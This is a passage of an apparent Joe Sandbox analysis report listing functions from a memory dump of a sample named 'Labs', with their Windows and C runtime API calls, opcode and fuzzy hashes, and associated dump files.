Instruction Fuzzy Hash: EEF0B471901B25DADF527B79B80AB6E77A26F41730F168209F824AB1C2CB7C4A419F52

Function 00795E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00795EB4
__ftell_nolock.LIBCMT ref: 00795EBF

Part of subcall function 00798D58: __getptd_noexit.LIBCMT ref: 00798D58

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
Instruction ID: abbe48f266128d07d0976ffe789939bf475f191d7b64b04898c8bfa913e99399
Opcode Fuzzy Hash: d073b907152be0ef83920f02361e67b3b659c50961dcef9ddb0083fcf0d7e5cf
Instruction Fuzzy Hash: D6F0A771911625DADF41BB74A80B75E76906F02331F254307B424EF1C2CF7C4A419B56

Function 00785AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00785AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00785B1F

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
Instruction ID: be90293254a7d2af330554e219f162d4de28543c40f2f41ad0324293daa26d2f
Opcode Fuzzy Hash: cfdab443a1912d62fe5af922a9683b0acbab904fb9e895b48b170b3e65c03aed
Instruction Fuzzy Hash: 91F0A7B08083089FE7A2DB64DC497967BBCA70030CF0001E9AA4996292DB754B88CF55

Function 007932CF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 007932D5

Part of subcall function 0079329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,007932DA,00791003,?,00799EEE,000000FF,0000001E,0082CE28,00000008,00799E52,00791003,00791003), ref: 007932AA
Part of subcall function 0079329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 007932BC

ExitProcess.KERNEL32 ref: 007932DE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 8a2a7a7ac09da2bb4bbbe45fc484771bc273c51dd72154e6352cc79afa523424
Instruction ID: 18d17d8a4836c561b13edae09330f804915dba325f659df55308dc229c7391d3
Opcode Fuzzy Hash: 8a2a7a7ac09da2bb4bbbe45fc484771bc273c51dd72154e6352cc79afa523424
Instruction Fuzzy Hash: 25B09230000208BBCF422F11EC0E8487F69FB00A90B008020F80408131DF72AA929A80

Function 007EC355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
Instruction ID: aedd52b19fa8d92a019576a2491c72e232eb3c6bdb0e47725fee543169f72d2a
Opcode Fuzzy Hash: 3e44bb3b1d2cc6c24dc35030e7b5e1729bc8ed23ddc0166106abb9453c1e48f7
Instruction Fuzzy Hash: 55B19F34A0114ADFCF15EF99C885DEEBBB5FF48710F20801AF915A7291EB34A952CB90

Function 0078343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0078351A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 46fb8d349e8bd5aa5ca793a3ec8ad337f7e93736dc869547996377e132eb7964
Instruction ID: d17a173b5ec072b4ca1c4f49edbda41a0077fc87aa554ad5cc1466888a9670d5
Opcode Fuzzy Hash: 46fb8d349e8bd5aa5ca793a3ec8ad337f7e93736dc869547996377e132eb7964
Instruction Fuzzy Hash: 3A31A075644A02DFC724EF1DD494A31F7A0FF09B10714C56DE98A8B7A1D734E991CB90

Function 007AE2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 007AE2EA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: ac86c61d7e78404cd6e40e40a489cbe3d99071e700c2e0ff404186cf55c81581
Instruction ID: bc24208a3791647837c7237376f47020b0b91c26a2d02693d31cd53b5cc84f88
Opcode Fuzzy Hash: ac86c61d7e78404cd6e40e40a489cbe3d99071e700c2e0ff404186cf55c81581
Instruction Fuzzy Hash: F0412C74504741DFDB14DF14C498B1ABBE1BF85348F1989ACE4899B362C37AEC45CB52

Function 007849C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00784B29: FreeLibrary.KERNEL32(00000000,?), ref: 00784B63

Part of subcall function 0079547B: __wfsopen.LIBCMT ref: 00795486

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,007827AF,?,00000001), ref: 007849F4

Part of subcall function 00784ADE: FreeLibrary.KERNEL32(00000000), ref: 00784B18

Part of subcall function 007848B0: _memmove.LIBCMT ref: 007848FA

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
Instruction ID: c431e3816fc8a7a5a32a5a4c3c2e2daca860278b78aa1b2b78adc92c5b190b6c
Opcode Fuzzy Hash: d3d9e8ea25a9abca74fc72ae45e2e29e3467ee63fd3101e7cd2d6d4b7b35e8ca
Instruction Fuzzy Hash: B611E7316D0216EBCF18FB70CC0AFAE77A99F40701F10C42DF541BA191EABC9A11AB95

Function 00781BCC Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00781BFE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: cbdbda37454f878be5aaa8f5a4907d343702eb5e2a6fbab04f377d328726f301
Instruction ID: e6858d14f9a6c14dd6816fcbf28e107da3441591397b670ec0d31a3ca9daa90d
Opcode Fuzzy Hash: cbdbda37454f878be5aaa8f5a4907d343702eb5e2a6fbab04f377d328726f301
Instruction Fuzzy Hash: E2115E76244601DFCB24DF28E481916F7F9FF49350B60C82EE49ACB261E736E841CB50

Function 007AE3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 007AE3CE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 6878a57106b723d5263bedb4a078cc64788b497ffc78774010b67a19cf3ba0bb
Instruction ID: 83c8a5842454d9079c158bebc92286eec80f3a7684c886b9640ae6d8ede891dc
Opcode Fuzzy Hash: 6878a57106b723d5263bedb4a078cc64788b497ffc78774010b67a19cf3ba0bb
Instruction Fuzzy Hash: 742134B4608741DFCB54DF54C458B1ABBE1BF89344F09896CF88A57322C739E849CBA2

Function 00781AA4 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00781AF8

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: c56ae0350e79e7dc7cf296be5e1f7aafe6e3e89e61c1803238559a6dfa02d677
Instruction ID: 3ace0d2ad95187a2178ffdbd925249cdb56f8d97904c4042930f3f54eda8b87f
Opcode Fuzzy Hash: c56ae0350e79e7dc7cf296be5e1f7aafe6e3e89e61c1803238559a6dfa02d677
Instruction Fuzzy Hash: 6C012BB2250512AFD718DF38DC81D35F79CEF05760B60822AE916CF2D0E7349812C790

Function 00781A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00781A77

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction ID: 31bfcb90f6b3017888e0089d8a595c2d98a76f2968dc47844990ca729cd30618
Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction Fuzzy Hash: E701F972251701AED7246F38EC06F77BB9CDB447A0F50C52EF52ACA1D1EA35E5508790

Function 007E495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 007E4998

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 401f15c219f87c7a2d069df9d0b9da696f3e86ddd06c869b56eab92327f2a97f
Instruction ID: b9110513951f5863396915a9f3e6ded76a298cb5b9d457646406601f7c499a35
Opcode Fuzzy Hash: 401f15c219f87c7a2d069df9d0b9da696f3e86ddd06c869b56eab92327f2a97f
Instruction Fuzzy Hash: C4F04435608109EFCB14FB65D84AC9F77BCEF49720B404056F9089B251DE75BD41C750

Function 00784A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00784AA4

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 53a643b67b6a590ecc0a0a10ea7cf60179caf1a4fad84d7462fc235bea07fc7e
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: 61F085B6400208FFDF159F95EC04DEBBF79EB89320F00819CF9045A210D272EA218BA0

Function 00784A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,007827AF,?,00000001), ref: 00784A63

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9da1f86b95fba57858813ee34ca7ca1ab98f801e686397e1847f6b6b50a81778
Instruction ID: 72dcaddeec96ed52593c60914bb06b1992bd187a6102c604d6c862cf24443b90
Opcode Fuzzy Hash: 9da1f86b95fba57858813ee34ca7ca1ab98f801e686397e1847f6b6b50a81778
Instruction Fuzzy Hash: 64F01571185712CFCB38AF64E494816BBF1BF14325320C92EE1D68B611C7BA9984DF55

Function 00784AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00784AD0

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 034805f09dd58d5e6fe514380c1de94324c0ac9d322466ca32ce1b7961f88d02
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 30F0F87240020DFFDF05DF90C945EAABB79FB14314F208589F9198A212D376EA21AB91

Function 007E2D68 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 007E1E06: CloseHandle.KERNEL32(?,?,?,007E2D8B,?,?), ref: 007E1E12
Part of subcall function 007E1E06: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,007E2D8B,?,?), ref: 007E1E1F

__beginthread.LIBCMT ref: 007E2D93

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CloseCreateEventHandle__beginthread
String ID:
API String ID: 1494023155-0
Opcode ID: addbac5be56e9a40993c08c2a223629a33a52685745689a79add4eb63863f9c4
Instruction ID: 5ca591ca7c3ac849d7312ab8cc9b853dee043739db8b168398403334bed29c17
Opcode Fuzzy Hash: addbac5be56e9a40993c08c2a223629a33a52685745689a79add4eb63863f9c4
Instruction Fuzzy Hash: D6E0D871916394A6D771E576DC0BFD67E9C4F08350F040426F54910193D67C5585C2E1

Function 007909C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 007909E4

Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 8afec97575457e87125ffd6ff51f96e16aa5431f3bbdc2ba94b3be1f11c7079c
Instruction ID: 3b29071c607f504e873fb6f78c6b774d13b97c6cd518449383be0c64fd67f677
Opcode Fuzzy Hash: 8afec97575457e87125ffd6ff51f96e16aa5431f3bbdc2ba94b3be1f11c7079c
Instruction Fuzzy Hash: 94E0863690012857C721A6989C0AFEA77DDEB896A0F0502B6FC08D7344D9649C818A91

Function 007D4FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c80ba374d4a18d1b287b4d38bdd914fe54dc3949002c6b426c81da18f4965c8c
Instruction ID: 74024ab245ae7a00f49aa614dfe4aca3ca7616f949740f75056aa7dc31baa959
Opcode Fuzzy Hash: c80ba374d4a18d1b287b4d38bdd914fe54dc3949002c6b426c81da18f4965c8c
Instruction Fuzzy Hash: 49B09234000600579E781F3C99481A933A168423A9BDC1B82E478856F1963D884FA920

Function 0079547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00795486

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: b2d35f90c2f9aa07c9b2b753bb7626d1facca782fed56f808c62141ea5f2e39c
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 50B0927644020CB7CE022A82FC03E593B299B40A68F408020FB0C1C172A677A6A09689

Function 00793588 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 00793592

Part of subcall function 00793459: __lock.LIBCMT ref: 00793467
Part of subcall function 00793459: DecodePointer.KERNEL32(0082CB70,0000001C,007933B2,00791003,00000001,00000000,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934A6
Part of subcall function 00793459: DecodePointer.KERNEL32(?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934B7
Part of subcall function 00793459: EncodePointer.KERNEL32(00000000,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934D0
Part of subcall function 00793459: DecodePointer.KERNEL32(-00000004,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934E0
Part of subcall function 00793459: EncodePointer.KERNEL32(00000000,?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934E6
Part of subcall function 00793459: DecodePointer.KERNEL32(?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 007934FC
Part of subcall function 00793459: DecodePointer.KERNEL32(?,00793300,000000FF,?,00799E5E,00000011,00791003,?,00799CAC,0000000D), ref: 00793507

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
